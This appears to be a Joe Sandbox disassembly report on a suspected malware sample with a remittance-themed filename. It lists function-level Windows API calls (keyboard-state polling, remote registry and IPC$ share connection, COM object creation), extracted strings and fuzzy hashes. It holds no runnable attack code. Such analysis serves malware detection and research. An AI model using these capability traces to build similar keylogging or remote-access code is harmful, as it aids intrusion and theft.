                                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                      • String ID: 2
                                                                      • API String ID: 1331449709-450215437
                                                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                      • API String ID: 3054410614-2561132961
                                                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 600699880-22481851
                                                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyWindow
                                                                      • String ID: static
                                                                      • API String ID: 3375834691-2160076837
                                                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                      • API String ID: 2907320926-3566645568
                                                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                      APIs
                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                      • DeleteObject.GDI32(00780045), ref: 00470A04
                                                                      • DestroyIcon.USER32(00740069), ref: 00470A1C
                                                                      • DeleteObject.GDI32(81F8163D), ref: 00470A34
                                                                      • DestroyWindow.USER32(0070006D), ref: 00470A4C
                                                                      • DestroyIcon.USER32(?), ref: 00470A73
                                                                      • DestroyIcon.USER32(?), ref: 00470A81
                                                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1237572874-0
                                                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                      • GetKeyState.USER32(00000011), ref: 00444903
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3413494760-0
                                                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                      • String ID: AU3_FreeVar
                                                                      • API String ID: 2634073740-771828931
                                                                      • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                      • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 0046C63A
                                                                      • CoUninitialize.OLE32 ref: 0046C645
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 2294789929-1287834457
                                                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                      APIs
                                                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                      • ReleaseCapture.USER32 ref: 0047116F
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 2483343779-2107944366
                                                                      • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                      • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                      • _wcslen.LIBCMT ref: 00450720
                                                                      • _wcscat.LIBCMT ref: 00450733
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 4008455318-3975388722
                                                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                      • GetParent.USER32 ref: 00469C98
                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                      • GetParent.USER32 ref: 00469CBC
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2360848162-1403004172
                                                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
